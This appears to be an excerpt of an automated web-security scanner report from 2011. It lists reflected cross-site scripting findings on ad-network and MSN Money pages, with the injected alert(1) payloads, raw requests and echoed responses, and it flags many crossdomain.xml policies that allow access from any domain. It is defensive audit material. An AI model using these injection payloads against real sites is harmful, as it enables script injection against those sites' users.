GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&9b8c5<script>alert(1)</script>dd9b7d29648; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 30 Jan 2011 01:40:25 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:40:25 2011&9b8c5<script>alert(1)</script>dd9b7d29648=&prad=58087454&arc=40401740&; expires=Sat 30-Apr-2011 01:40:25 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296351625; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26537
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087454",Pid:"p85001580",Arc:"40401740",Location:CO ...[SNIP]... 011&prad=55352400&cpn=4&arc=38899481&', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&9b8c5<script>alert(1)</script>dd9b7d29648', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5 ...[SNIP]...
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d02c"-alert(1)-"1076a141a3e was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var zzStr = "s=123;u=INmz6woBADYAAHrQ5V4AAACH~0104115d02c"-alert(1)-"1076a141a3e;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7e3a"-alert(1)-"37913713bab was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var zzStr = "s=2;u=INmz6woBADYAAHrQ5V4AAACH~010411b7e3a"-alert(1)-"37913713bab;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
5.356. http://redacted/home.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://moneycentral.msn.com
Path:
/home.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edfff"><script>alert(1)</script>c74f635b791 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /home.asp?edfff"><script>alert(1)</script>c74f635b791=1 HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 30 Jan 2011 02:15:43 GMT Server: Microsoft-IIS/6.0 Location: http://money.redacted//?edfff"><script>alert(1)</script>c74f635b791=1 Content-Length: 100
object moved <a href="http://money.msn.com//?edfff"><script>alert(1)</script>c74f635b791=1">here</a>
5.357. http://redacted/investor/home.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://moneycentral.msn.com
Path:
/investor/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4755d"><script>alert(1)</script>10ee24922f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /investor/home.aspx?4755d"><script>alert(1)</script>10ee24922f0=1 HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 29 Jan 2011 23:48:18 GMT Server: Microsoft-IIS/6.0 Location: http://money.redacted/investing?4755d"><script>alert(1)</script>10ee24922f0=1 Content-Length: 108
object moved <a href="http://money.msn.com/investing?4755d"><script>alert(1)</script>10ee24922f0=1">here</a>
5.358. http://redacted/investor/home.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://moneycentral.msn.com
Path:
/investor/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec77d"style%3d"x%3aexpression(alert(1))"dc5f63f4feb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec77d"style="x:expression(alert(1))"dc5f63f4feb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /investor/home.aspx?ec77d"style%3d"x%3aexpression(alert(1))"dc5f63f4feb=1 HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 30 Jan 2011 18:03:22 GMT Server: Microsoft-IIS/6.0 Location: http://money.redacted/investing?ec77d"style="x:expression(alert(1))"dc5f63f4feb=1 Content-Length: 112
object moved <a href="http://money.msn.com/investing?ec77d"style="x:expression(alert(1))"dc5f63f4feb=1">here</a>
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc63c"-alert(1)-"cbcff432d44 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a/7665/13236/25159-2.js HTTP/1.1 Host: optimized-by.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="28 Jan 2011 14:48:45 GMT"; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1185=3011330574290390485; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; rdk=7665/13236; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_1994=6ch47d7o8wtv; put_2100=usr3fd748acf5bcab14; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3297869551067506954; khaos=GIPAEQ2D-C-IOYY; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; ruid=fc63c"-alert(1)-"cbcff432d44; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; ses9=9320^1&7531^1; put_1986=4760492999213801733; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rdk2=0; ses2=7531^1&13236^1; cd=false;
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:17:37 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=7665/13236; expires=Sun, 30-Jan-2011 03:17:37 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk2=0; expires=Sun, 30-Jan-2011 03:17:37 GMT; max-age=10; path=/; domain=.rubiconproject.com Set-Cookie: ses2=7531^1&13236^2; expires=Mon, 31-Jan-2011 05:59:59 GMT; max-age=106942; path=/; domain=.rubiconproject.com P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi2=3189870.js^1^1296353857^1296353857&3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; expires=Sun, 06-Feb-2011 02:17:37 GMT; max-age=604800; path=/; domain=.rubiconproject.com; Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2102
The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db31b"%3balert(1)//e45c3d069cd was submitted in the IP cookie. This input was echoed as db31b";alert(1)//e45c3d069cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/counter.asp HTTP/1.1 Host: s18.sitemeter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: IP=173%2E193%2E214%2E243db31b"%3balert(1)//e45c3d069cd;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 02:18:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7206 Content-Type: application/x-javascript Expires: Sun, 30 Jan 2011 02:28:56 GMT Cache-control: private
// Copyright (c)2006 Site Meter, Inc. // <![CDATA[ var SiteMeter = { init:function( sCodeName, sServerName, sSecurityCode ) { SiteMeter.CodeName = sCodeName; SiteMeter.ServerName = sServerName; SiteMeter.SecurityCode = sSecurityCode; SiteMeter.IP = "173.193.214.243db31b";alert(1)//e45c3d069cd"; SiteMeter.trackingImage = new Image(); SiteMeter.dgOutlinkImage = new Image();
if (typeof(g_sLastCodeName) != 'undefined') if (g_sLastCodeName == sCodeName) return;
The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9ea8"%3balert(1)//3ef96a62d10 was submitted in the IP cookie. This input was echoed as c9ea8";alert(1)//3ef96a62d10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/counter.js HTTP/1.1 Host: s18.sitemeter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: IP=173%2E193%2E214%2E243c9ea8"%3balert(1)//3ef96a62d10;
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 02:18:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7206 Content-Type: application/x-javascript Expires: Sun, 30 Jan 2011 02:28:57 GMT Cache-control: private
// Copyright (c)2006 Site Meter, Inc. // <![CDATA[ var SiteMeter = { init:function( sCodeName, sServerName, sSecurityCode ) { SiteMeter.CodeName = sCodeName; SiteMeter.ServerName = sServerName; SiteMeter.SecurityCode = sSecurityCode; SiteMeter.IP = "173.193.214.243c9ea8";alert(1)//3ef96a62d10"; SiteMeter.trackingImage = new Image(); SiteMeter.dgOutlinkImage = new Image();
if (typeof(g_sLastCodeName) != 'undefined') if (g_sLastCodeName == sCodeName) return;
The value of the AA002 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f364'-alert(1)-'aa543a3cef9 was submitted in the AA002 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /PTR/jview/240321567/direct;wi.1;hi.1/01?relocate=http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-37866079f364'-alert(1)-'aa543a3cef9; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 420 Content-Type: text/javascript Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:34:41 GMT
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.ae.doubleclick.net
Response
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 393 Last-Modified: Wed, 22 Oct 2008 17:22:35 GMT Date: Sun, 30 Jan 2011 14:48:18 GMT
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.doubleclick.net --> <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ajax.googleapis.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: ak.c.ooyala.com Proxy-Connection: keep-alive Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK x-amz-id-2: wpK4wcLXOVar2wzl8i2KDRsRUb/FDGbkmhSofLdqHUeOScSp9vxoM5FhXzpTep7i x-amz-request-id: 756D4F260FA6AE9C Last-Modified: Mon, 12 Jan 2009 21:58:46 GMT ETag: "124fa42a56284acbe74862f0024af4f3" Content-Type: text/x-cross-domain-policy Content-Length: 157 Server: AmazonS3 Cache-Control: max-age=604800 Date: Sun, 30 Jan 2011 12:49:00 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: amch.questionmarket.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ar.voicefive.com
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 30 Jan 2011 01:40:19 GMT Content-Type: text/xml Connection: close Vary: Accept-Encoding Accept-Ranges: bytes Content-Length: 230 Vary: Accept-Encoding,User-Agent P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: atl.whitepages.com
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86) Date: Sun, 30 Jan 2011 01:40:27 GMT X-DirectServer: whitepg_DS4 Content-Type: text/xml Content-Length: 95 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: b.rad.redacted
Response
HTTP/1.1 200 OK Cache-Control: max-age=604800 Content-Type: text/xml Last-Modified: Fri, 21 Jan 2011 01:07:24 GMT Accept-Ranges: bytes ETag: "02ee18f7b9cb1:0" Server: Microsoft-IIS/7.5 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sun, 30 Jan 2011 01:40:48 GMT Connection: keep-alive Content-Length: 202
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: b.voicefive.com
Response
HTTP/1.0 200 OK Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT Content-Type: application/xml Expires: Mon, 31 Jan 2011 01:40:59 GMT Date: Sun, 30 Jan 2011 01:40:59 GMT Content-Length: 201 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: b3.mookie1.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:41:03 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Last-Modified: Thu, 03 Jun 2010 03:38:56 GMT ETag: "1ae5fe-d0-f2349400" Accept-Ranges: bytes Content-Length: 208 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/xml Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: beta-ads.ace.advertising.com
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Cache-Control: private, max-age=0, no-cache Expires: Sun, 30 Jan 2011 02:06:03 GMT Content-Type: text/xml Content-Length: 81 Date: Sun, 30 Jan 2011 02:06:03 GMT Connection: close Set-Cookie: A07L=CT; expires=Sun, 27-Feb-2011 02:06:03 GMT; path=/; domain=beta-ads.ace.advertising.com P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: blstj.redacted
Response
HTTP/1.0 200 OK Cache-Control: max-age=31536000 Content-Type: text/xml Accept-Ranges: bytes ETag: "06e6dae977dc81:0", Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET S: BLUMPPSTCA01 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Content-Length: 224 Age: 6330306 Date: Sun, 30 Jan 2011 01:41:05 GMT Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT Expires: Thu, 17 Nov 2011 19:15:59 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: college.scout.com
Response
HTTP/1.1 200 OK Content-Length: 222 Content-Type: text/xml Content-Location: http://college.scout.com/crossdomain.xml Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT Accept-Ranges: bytes ETag: "01f3482dc3fcb1:e39" Server: Microsoft-IIS/6.0 Server: Static2 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:07:55 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: collegebasketball.scout.com
Response
HTTP/1.1 200 OK Content-Length: 222 Content-Type: text/xml Content-Location: http://collegebasketball.scout.com/crossdomain.xml Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT Accept-Ranges: bytes ETag: "01f3482dc3fcb1:e39" Server: Microsoft-IIS/6.0 Server: Static2 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:07:56 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: collegefootball.scout.com
Response
HTTP/1.1 200 OK Content-Length: 222 Content-Type: text/xml Content-Location: http://collegefootball.scout.com/crossdomain.xml Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT Accept-Ranges: bytes ETag: "01f3482dc3fcb1:9f5" Server: Microsoft-IIS/6.0 Server: Static1 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:07:57 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.
